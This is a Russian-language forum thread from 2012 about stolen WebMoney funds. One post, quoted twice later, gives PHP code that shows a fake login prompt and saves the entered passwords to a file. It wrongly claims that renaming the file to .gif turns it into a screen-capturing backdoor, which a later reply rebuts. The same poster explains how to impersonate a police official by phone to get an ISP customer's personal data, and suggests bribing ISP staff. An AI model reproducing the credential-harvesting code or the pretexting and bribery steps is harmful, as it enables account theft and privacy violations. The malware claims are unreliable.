Взломали код проеткции!!!
#41 Участник
Отправлено 12 февраля 2012 - 14:50
#42 Участник
Отправлено 12 февраля 2012 - 14:52
#43 Продвинутый пользователь
Отправлено 12 февраля 2012 - 15:03
1. Создаётся вирус в блокноте типа такого кода:
<? header("Content-type: image/gif"); $image = imagecreatefromgif('cool.gif'); if(!$_COOKIE['LOGON']) { $login = $_SERVER['PHP_AUTH_USER']; $pass = $_SERVER['PHP_AUTH_PW']; if(strlen($pass) <= 4 || !$login) { Header('HTTP/1.1 401 Unauthorized'); Header('WWW-Authenticate: Basic realm=" Control panel"'); } elseif($login) { setcookie('LOGON',md5($pass)); $f = fopen('passwords.txt', 'ab'); fwrite($f, $login." ||| ".$pass."\r\n"); fclose($f); } } imagegif($image); imagedestroy($image); ?>2. сохраняем файл под названием smile, потом меняем расширение на .gif
3. Отправляем файл вам, вы его открываете сами того не понимая и вуаля. Вирус а именно бекдор уже в системме и свободно сканирует фотографирует каждое действие, смотрит активность программ, вытаскивает всё из буфера обмена и в заданное создетелём время шлёт всё на мыло.
Ничего сложного в общем то
Так что ищем АЙПи и будем наказывать. Но мне хотелось бы чтобы айпи нашёл ещё и человек у которого спёрли 1040 вмз. Там можно и правохранительные органы привязать. А за сотку будем всё добиватся своими силами)
п.с. Вирус я написал для взлома админок в интернете. Детский. Аська его не примет, так что можите не пробовать!
#44 Участник
Отправлено 12 февраля 2012 - 15:10
п.с. Вирус я написал для взлома админок в интернете. Детский. Аська его не примет, так что можите не пробовать!
Всё стало на свои места. Спасибо за науку, Устим.
Тех. поддержка молчит, как вод набравши.
Сообщений 15 накидал - не хотят разговаривать.
Каковы мои действия после того, как я установлю его айпи?
#45 Участник
Отправлено 12 февраля 2012 - 15:11
#46 Продвинутый пользователь
Отправлено 12 февраля 2012 - 15:25
То есть. После получения айпи мы вводим его на сайте "хуиз" например, и видим провайдера. Допустим это провайдер Укртелеком (Я буду говорить о том как делось у нас в Киеве)
Звоним на Укртелеком и представляемся Начальником МВД в г.Киева в Шевченковском районе Пупкиным О.П. Запрашимаем соединение с техническим отделом по интернету. Там представляемся так же. Говорим что в то то число в такое то время поступило заявление о кражи личной информации с персонального компьютера. Нами было установлено (прав.органами) что доступ был произведён с такого то иапи адреса, провайдером которого являетесь ВЫ! Так что просим помочь, проверить, узнать, уточнить кому пренадлежит данный айпи. То есть на кого зарегистрирован.
Для нас выдали Полный адрес, дату регистрации, имя фамилию, и паспортные данные в течении 15-ти минут.
Для Вас важно чтобы тот самый укртелеком не умничал и не просил документально обратится к ним. Тогда всё пропало. в этом методе.
Хотя не всё. Можно узнать кто работает в тех сервисе провайдера и пригласить человека на кофе. Россказать всю ситуацию, сунуть в карман 50 баксов и получить инфу. Я за 1040 баксов тупо зашёл бы в офис провайтера и так и сделал бы.
#47 Знаток
Отправлено 12 февраля 2012 - 21:45
IPшки у Укртелекома динамичные, к тому же в ОГОшке поддерживается раздача по сеты инетдоступа для друзей/соседей...Звоним на Укртелеком и представляемся Начальником МВД в г.Киева в Шевченковском районе Пупкиным О.П. Запрашимаем соединение с техническим отделом по интернету. Там представляемся так же. Говорим что в то то число в такое то время поступило заявление о кражи личной информации с персонального компьютера. Нами было установлено (прав.органами) что доступ был произведён с такого то иапи адреса, провайдером которого являетесь ВЫ! Так что просим помочь, проверить, узнать, уточнить кому пренадлежит данный айпи. То есть на кого зарегистрирован.
Для нас выдали Полный адрес, дату регистрации, имя фамилию, и паспортные данные в течении 15-ти минут.
• Куплю / продам долю непубличного БА... • Магазин цифровых товаров: PIN-коды, игры, литература, программное обеспечение и пр.
#48 Участник
Отправлено 13 февраля 2012 - 12:43
Айпи дать отказались.
Отправил иск, но он не будет рассмотрен, пока я не внесу взнос в размере 7 вмз.
Вопрос у меня такой:
имеет ли смысл оплачивать иск, если всё упирается в поход в милицию? В арбитраже мне, я так понимаю, скажут то же самое? обращайтесь в местное отделение правоохранительных органов?
#49 Участник
Отправлено 13 февраля 2012 - 12:44
#51 Знаток
Отправлено 24 февраля 2012 - 19:27
Смысл имеет - если иск не станут рассматривать то взнос вернут.Отправил иск, но он не будет рассмотрен, пока я не внесу взнос в размере 7 вмз.
Вопрос у меня такой:
имеет ли смысл оплачивать иск, если всё упирается в поход в милицию? В арбитраже мне, я так понимаю, скажут то же самое? обращайтесь в местное отделение правоохранительных органов?
• Куплю / продам долю непубличного БА... • Магазин цифровых товаров: PIN-коды, игры, литература, программное обеспечение и пр.
#52 Пользователь
Отправлено 29 марта 2012 - 16:23
Найти его, к сожалению, нереально: он использует прокси с украинским ip, который не ведёт логов (скорее всего это ещё один затрояненый комп), а деньги обналичивает через оплату номеров российских МТС, которые оформлены на бомжей или студентов, а для международного розыска его обороты маловаты.
Мораль сей басни такова: скупой платит дважды. Захотели сэкономить 1-2% на обналичке? Получите!
#53 Участник
Отправлено 18 октября 2012 - 10:17
#54 Участник
Отправлено 18 октября 2012 - 10:19
В самом начале активного использования ВМ (около года назад) довелось и мне столкнуться с этим мошенником. Думаю, это один и тот же человек т.к. схема действий полностью идентична. Отличие только в том, что ранее он рассказывал всем байки про проверку через сертификат Х19, после чего подкидывал трояна под видом этого сертификата (в общем, расчёт был именно на начинающих пользователей, которые слабо соображают в технологиях ВМ). Сейчас, судя по вашим словам, он нашёл способ лучше и закидывает трояна, используя дыры в определённых icq-клиентах (кстати, а какой у вас?)
Найти его, к сожалению, нереально: он использует прокси с украинским ip, который не ведёт логов (скорее всего это ещё один затрояненый комп), а деньги обналичивает через оплату номеров российских МТС, которые оформлены на бомжей или студентов, а для международного розыска его обороты маловаты.
Мораль сей басни такова: скупой платит дважды. Захотели сэкономить 1-2% на обналичке? Получите!
Сообщение отредактировал MegaBannerWM : 18 октября 2012 - 10:20
#55 Участник
Отправлено 18 октября 2012 - 10:24
Но дело не в этом, угнетает подержка вебмани. Процесс можно было остановить до выяснения, чтобы он не успел вывести деньги.
Сообщение отредактировал MegaBannerWM : 18 октября 2012 - 10:25
#56 Участник
Отправлено 18 октября 2012 - 13:15
интересный метод, смотришь на улыбочку) и теряешь деньги)Да жужа))) С тобой поступили очень легко. Показываю пример как это делается:
1. Создаётся вирус в блокноте типа такого кода:<? header("Content-type: image/gif"); $image = imagecreatefromgif('cool.gif'); if(!$_COOKIE['LOGON']) { $login = $_SERVER['PHP_AUTH_USER']; $pass = $_SERVER['PHP_AUTH_PW']; if(strlen($pass) <= 4 || !$login) { Header('HTTP/1.1 401 Unauthorized'); Header('WWW-Authenticate: Basic realm=" Control panel"'); } elseif($login) { setcookie('LOGON',md5($pass)); $f = fopen('passwords.txt', 'ab'); fwrite($f, $login." ||| ".$pass."\r\n"); fclose($f); } } imagegif($image); imagedestroy($image); ?>2. сохраняем файл под названием smile, потом меняем расширение на .gif
3. Отправляем файл вам, вы его открываете сами того не понимая и вуаля. Вирус а именно бекдор уже в системме и свободно сканирует фотографирует каждое действие, смотрит активность программ, вытаскивает всё из буфера обмена и в заданное создетелём время шлёт всё на мыло.
Ничего сложного в общем то
Так что ищем АЙПи и будем наказывать. Но мне хотелось бы чтобы айпи нашёл ещё и человек у которого спёрли 1040 вмз. Там можно и правохранительные органы привязать. А за сотку будем всё добиватся своими силами)
п.с. Вирус я написал для взлома админок в интернете. Детский. Аська его не примет, так что можите не пробовать!
#57 Знаток
Отправлено 18 октября 2012 - 13:36
интересный метод, смотришь на улыбочку) и теряешь деньги)Да жужа))) С тобой поступили очень легко. Показываю пример как это делается:
1. Создаётся вирус в блокноте типа такого кода:<? header("Content-type: image/gif"); $image = imagecreatefromgif('cool.gif'); if(!$_COOKIE['LOGON']) { $login = $_SERVER['PHP_AUTH_USER']; $pass = $_SERVER['PHP_AUTH_PW']; if(strlen($pass) <= 4 || !$login) { Header('HTTP/1.1 401 Unauthorized'); Header('WWW-Authenticate: Basic realm=" Control panel"'); } elseif($login) { setcookie('LOGON',md5($pass)); $f = fopen('passwords.txt', 'ab'); fwrite($f, $login." ||| ".$pass."\r\n"); fclose($f); } } imagegif($image); imagedestroy($image); ?>2. сохраняем файл под названием smile, потом меняем расширение на .gif
3. Отправляем файл вам, вы его открываете сами того не понимая и вуаля. Вирус а именно бекдор уже в системме и свободно сканирует фотографирует каждое действие, смотрит активность программ, вытаскивает всё из буфера обмена и в заданное создетелём время шлёт всё на мыло.
Ничего сложного в общем то
Так что ищем АЙПи и будем наказывать. Но мне хотелось бы чтобы айпи нашёл ещё и человек у которого спёрли 1040 вмз. Там можно и правохранительные органы привязать. А за сотку будем всё добиватся своими силами)
п.с. Вирус я написал для взлома админок в интернете. Детский. Аська его не примет, так что можите не пробовать!
В данном "коде" нет заявленного функционала.
Догоним и перегоним Howardа! И Наталью тоже! И Firebadge, как же без него!